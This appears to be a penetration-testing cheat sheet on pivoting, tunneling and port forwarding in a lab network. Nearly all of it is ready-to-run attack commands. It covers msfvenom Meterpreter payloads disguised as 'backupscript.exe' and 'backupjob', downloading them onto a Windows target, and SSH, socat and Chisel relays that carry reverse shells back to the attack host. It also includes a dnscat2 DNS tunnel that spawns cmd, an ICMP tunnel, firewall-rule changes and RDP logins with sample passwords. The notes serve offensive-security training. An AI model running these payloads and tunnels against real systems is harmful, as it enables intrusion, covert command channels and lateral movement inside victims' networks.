Pivoting, Tunneling, and Port Forwarding
Dynamic Port Forwarding with SSH and SOCKS Tunneling
Local Port Forwarding
# 1234 - attack host port
# 3306 - target host port
ssh -L 1234:localhost:3306 Ubuntu@ip
# Confirm
netstat -antp | grep 1234
# Multiple port forward
ssh -L 1234:localhost:3306 8080:localhost:80 ubuntu@ip
Dynamic Port Forwarding
# Enabling Dynamic Port Forwarding
# 9050 - attack host port
ssh -D 9050 ubuntu@ip
# Editing proxychains configuration file /etc/proxychains.conf
# We can add socks4 127.0.0.1 9050 to the last line if it is not already there.
# Checking /etc/proxychains.conf
tail -4 /etc/proxychains.conf
# Using Nmap with Proxychains
proxychains nmap -v -sn 172.16.5.1-200 <--ip range which we were not able to scan before, i.e Internal Network
# Using Metasploit with Proxychains
proxychains msfconsole
# Using xfreerdp with Proxychains
proxychains xfreerdp /v:ip /u:eren /p:pass
Remote/Reverse Port Forwarding with SSH
# Creating a Windows Payload with msfvenom
msfvenom -p windows/x64/meterpreter/reverse_https lhost= <InteralIPofPivotHost> -f exe -o backupscript.exe LPORT=8080
# Configuring & Starting the multi/handler
set payload windows/x64/meterpreter/reverse_https
set lhost 0.0.0.0
set lport 8000
# Transferring Payload to Pivot Host
scp backupscript.exe ubuntu@<ipAddressofTarget>:~/
# Starting Python3 Webserver on Pivot Host
python3 -m http.server 8123
# Downloading Payload from Windows Target
PS C:\\Windows\\system32> Invoke-WebRequest -Uri "<http://172.16.5.129:8123/backupscript.exe>" -OutFile "C:\\backupscript.exe"
# SSH remote port forwarding
ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:8000 ubuntu@<ipAddressofTarget> -vN
# RUN the payload and get a shell
Meterpreter Tunneling & Port Forwarding
# Creating Payload for Ubuntu Pivot Host
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.16.10 -f elf -o backupjob LPORT=8080
# Configuring & Starting the multi/handler
set lhost 0.0.0.0
set lport 8080
set payload linux/x64/meterpreter/reverse_tcp
# Transfer and Execute the Payload on the Pivot Host
# After we get shell on Pivot host, we can user meterpreter modules for different tasks
# Ping Sweep module
run post/multi/gather/ping_sweep RHOSTS=172.16.5.0/23
# Ping Sweep For Loop on Linux Pivot Hosts
for i in {1..254} ;do (ping -c 1 172.16.5.$i | grep "bytes from" &) ;done
# Ping Sweep For Loop Using CMD
for /L %i in (1 1 254) do ping 172.16.5.%i -n 1 -w 100 | find "Reply"
# Ping Sweep Using PowerShell
1..254 | % {"172.16.5.$($_): $(Test-Connection -count 1 -comp 172.15.5.$($_) -quiet)"}
# **Configuring MSF's SOCKS Proxy**
use auxiliary/server/socks_proxy
set SRVPORT 9050
set SRVHOST 0.0.0.0
set version 4a
# Confirming Proxy Server is Running
jobs
# Adding a Line to proxychains.conf if Needed
socks4 127.0.0.1 9050
# Creating Routes with AutoRoute
use post/multi/manage/autoroute
set SESSION 1
set SUBNET 172.16.5.0
run autoroute -s 172.16.5.0/23
# Testing Proxy & Routing Functionality
proxychains nmap 172.16.5.19 -p3389 -sT -v -Pn
Port Forwarding - portfwd module
# Creating Local TCP Relay
portfwd add -l 3300 -p 3389 -r 172.16.5.19
# Connecting to Windows Target through localhost
xfreerdp /v:localhost:3300 /u:victor /p:pass@123
Meterpreter Reverse Port Forwarding
# Reverse Port Forwarding Rules
portfwd add -R -l 8081 -p 1234 -L 10.10.14.18
# Configuring & Starting multi/handler
# If we have a shell already, run bg command
set payload windows/x64/meterpreter/reverse_tcp
set LPORT 8081
set LHOST 0.0.0.0
# Generating the Windows Payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.5.129 -f exe -o backupscript.exe LPORT=1234
Socat
Socat Redirection with a Reverse Shell
# Starting Socat Listener on pivot host
# 10.10.14.18:80 - atttack host ip and port
socat TCP4-LISTEN:8080,fork TCP4:10.10.14.18:80
# Creating the Payload - Windows
# 172.16.5.129 - ip of pivot host
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=172.16.5.129 -f exe -o backupscript.exe LPORT=8080
# Configuring & Starting the multi/handler
set payload windows/x64/meterpreter/reverse_https
set lhost 0.0.0.0
set lport 80
Socat Redirection with a Bind Shell
# Creating the Payload - Windows
# Bind shell
msfvenom -p windows/x64/meterpreter/bind_tcp -f exe -o backupscript.exe LPORT=8443
# Starting Socat Bind Shell Listener
# 172.16.5.19:8443 - ip, port of system on internal network
socat TCP4-LISTEN:8080,fork TCP4:172.16.5.19:8443
# Configuring & Starting the Bind multi/handler
set payload windows/x64/meterpreter/bind_tcp
set RHOST 10.129.202.64 <-- ip of pivot host
set LPORT 8080 <-- port of pivot host
SSH for Windows: plink.exe
Dynamic port forwarding
# This starts an SSH session between the Windows attack host and the Ubuntu server, and then plink starts listening on port 9050.
plink -D 9050 ubuntu@10.129.15.50
# Proxifier - <https://www.proxifier.com/>
Proxifier can be used to start a SOCKS tunnel via the SSH session we created.
SSH Pivoting with Sshuttle
# Installation
sudo apt-get install sshuttle
# Running Sshuttle
sudo sshuttle -r ubuntu@10.129.202.64 172.16.5.0/23 -v
Web Server Pivoting with Rpivot
# Installation
sudo git clone <https://github.com/klsecservices/rpivot.git>
# python 2.7
sudo apt-get install python2.7
# Running server.py from the Attack Host
python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0
# Transfering rpivot to the Target
scp -r rpivot ubuntu@<IpaddressOfTarget>:/home/ubuntu/
# Running client.py from Pivot Target
python2.7 client.py --server-ip 10.10.14.18 --server-port 9999
# Browsing to the Target Webserver using Proxychains
proxychains firefox-esr 172.16.5.135:80
# Connecting to a Web Server using HTTP-Proxy & NTLM Auth
python client.py --server-ip <IPaddressofTargetWebServer> --server-port 8080 --ntlm-proxy-ip IPaddressofProxy> --ntlm-proxy-port 8081 --domain <nameofWindowsDomain> --username <username> --password <password>
Port Forwarding with Windows Netsh
# Using Netsh.exe to Port Forward
netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.15.150 connectport=3389 connectaddress=172.16.5.25
# Verifying Port Forward
netsh.exe interface portproxy show v4tov4
# changing firewall rules to allow the traffic (if needed)
netsh advfirewall firewall add rule name="forward_port_rule" protocol=TCP dir=in localip=192.168.151.10 localport=8080 action=allow
# Connecting to the Internal Host through the Port Forward
# traffice for 10.129.15.150:8080(pivot host ) will be forwarded to 172.16.5.25:3389(internal network host)
xfreerdp /v:10.129.15.150:8080 /u:eren /p:pass
DNS Tunneling with Dnscat2
# Cloning dnscat2 and Setting Up the Server
git clone <https://github.com/iagox86/dnscat2.git>
cd dnscat2/server/
gem install bundler
bundle install
# Starting the dnscat2 server, save secret key for future authentication
sudo ruby dnscat2.rb --dns host=10.10.14.18,port=53,domain=domain.local --no-cache
# Cloning dnscat2-powershell to the Attack Host
git clone <https://github.com/lukebaggett/dnscat2-powershell.git>
# Importing dnscat2.ps1
PS C:\> Import-Module .\\dnscat2.ps1
# establish a tunnel with the server running on our attack host.
PS C:\> Start-Dnscat2 -DNSserver 10.10.14.18 -Domain domain.local -PreSharedSecret 0ec04a91cd1e963f8c03ca499d589d21 -Exec cmd
# If eveything wokrs, we will get a shell, can use it to interact
# Listing dnscat2 Options
dnscat2> ?
# Interacting with the Established Session
dnscat2> window -i 1
SOCKS5 Tunneling with Chisel
# Setting Up & Using Chisel
git clone <https://github.com/jpillora/chisel.git>
cd chisel
go build
# Transferring Chisel Binary to Pivot Host
scp chisel ubuntu@10.129.202.64:~/
# Running the Chisel Server on the Pivot Host
./chisel server -v -p 1234 --socks5
# Connecting to the Chisel Server
./chisel client -v 10.129.202.64:1234 socks
# Editing & Confirming proxychains.conf
socks5 127.0.0.1 1080
# Pivoting to the DC
proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123
Chisel Reverse Pivot
# Starting the Chisel Server on our Attack Host
sudo ./chisel server --reverse -v -p 1234 --socks5
# Then we connect from the pivot host to our attack host, using the option R:socks
./chisel client -v 10.10.14.17:1234 R:socks
# Editing & Confirming proxychains.conf
socks5 127.0.0.1 1080
# Pivoting to internal host
proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123
ICMP Tunneling with SOCKS
# Setting Up & Using ptunnel-ng
git clone <https://github.com/utoni/ptunnel-ng.git>
# Building Ptunnel-ng with Autogen.sh
sudo ./autogen.sh
# Transferring Ptunnel-ng to the Pivot Host
scp -r ptunnel-ng ubuntu@10.129.202.64:~/
# Starting the ptunnel-ng Server on the Target Host
sudo ./ptunnel-ng -r10.129.202.64 -R22
# Connecting to ptunnel-ng Server from Attack Host
sudo ./ptunnel-ng -p10.129.202.64 -l2222 -r10.129.202.64 -R22
# Tunneling an SSH connection through an ICMP Tunnel
ssh -p2222 -lubuntu 127.0.0.1
# Enabling Dynamic Port Forwarding over SSH
ssh -D 9050 -p2222 -lubuntu 127.0.0.1
# Proxychaining through the ICMP Tunnel
proxychains nmap -sV -sT 172.16.5.19 -p3389
Last updated